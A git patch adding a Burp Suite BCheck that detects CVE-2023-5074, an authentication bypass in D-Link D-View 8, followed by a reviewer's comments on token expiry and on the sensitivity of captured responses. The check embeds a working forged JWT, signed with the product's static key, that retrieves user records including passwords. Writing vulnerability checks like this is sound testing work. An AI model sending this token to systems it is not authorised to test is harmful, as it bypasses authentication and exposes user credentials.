From 0cd321326f7bf5c987afa4a76e63e6f37db8d369 Mon Sep 17 00:00:00 2001
From: j0hnZ3RA
Date: Mon, 2 Oct 2023 23:19:03 -0300
Subject: [PATCH] CVE-2023-5074 D-Link D-View 8 v2.0.1.28 - Authentication Bypass
---
... v2.0.1.28 - Authentication Bypass.bcheck | 27 +++++++++++++++++++
1 file changed, 27 insertions(+)
create mode 100644 vulnerabilities-CVEd/CVE-2023-5074 D-Link D-View 8 v2.0.1.28 - Authentication Bypass.bcheck
diff --git a/vulnerabilities-CVEd/CVE-2023-5074 D-Link D-View 8 v2.0.1.28 - Authentication Bypass.bcheck b/vulnerabilities-CVEd/CVE-2023-5074 D-Link D-View 8 v2.0.1.28 - Authentication Bypass.bcheck
new file mode 100644
index 0000000..959e7af
--- /dev/null
+++ b/vulnerabilities-CVEd/CVE-2023-5074 D-Link D-View 8 v2.0.1.28 - Authentication Bypass.bcheck
@@ -0,0 +1,27 @@
+metadata:
+ language: v1-beta
+ name: "CVE-2023-5074 D-Link D-View 8 v2.0.1.28 - Authentication Bypass"
+ description: "Check for CVE-2023-5074"
+ author: "Joao Paulo Assis (j0hnZ3RA)"
+ tags: "CVE-2023-5074, D-Link, auth-bypass"
+
+
+define:
+ potential_path = "/dview8/api/usersByLevel"
+
+
+given host then
+ send request called check:
+ method: "GET"
+ path: {potential_path}
+ headers:
+ "Authorization": "eyJhbGciOiAiSFMyNTYiLCJ0eXAiOiAiand0In0.eyJvcmdJZCI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODA5YWEiLCJ1c2VySWQiOiAiNTkxNzFkNTYtZTZiNC00Nzg5LTkwZmYtYTdhMjdmZDQ4NTQ4IiwidHlwZSI6IDMsImtleSI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODkwYmIiLCJpYXQiOiAxNjg2NzY1MTk4LCJqdGkiOiAiZmRhOGU1YzNlNWY1MTQ5MDMzZThiM2FkNWI3ZDhjMjUiLCJuYmYiOiAxNjg2NzYxNTk4LCJleHAiOiAxODQ0NDQ1MTk4fQ.5swhQdiev4r8ZDNkJAFVkGfRTIaUQlwVue2AI18CrcI"
+
+
+ if {check.response.status_code} is "200" and "userName" in {check.response.body} and "passWord" in {check.response.body} and "isEmailActivate" in {check.response.body} and "application/json" in {check.response.headers} then
+ report issue:
+ severity: high
+ confidence: certain
+ detail: "Use of a static key to protect a JWT token used in user authentication can allow for an authentication bypass in D-Link D-View 8 v2.0.1.28."
+ remediation: "Upgrade to the latest version to mitigate this vulnerability."
+ end if
\ No newline at end of file
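Review bot: The hard-coded `Authorization` value is an opaque blob with no comment, and its payload appears to decode to an `exp` of 1844445198 (mid-2028), after which a server that validates expiry would likely reject it and this check would silently stop reporting. I would add a comment above `headers:` such as `# JWT signed with the product's static key (CVE-2023-5074); exp=1844445198, regenerate before then`, so maintainers know the check has a shelf life. Separately, a positive match means the stored response body holds user records including `passWord` fields, so the `detail` text should say that the captured response is sensitive and must be handled accordingly. The `remediation` string would be more actionable if it named the fixed release from the vendor advisory instead of "the latest version".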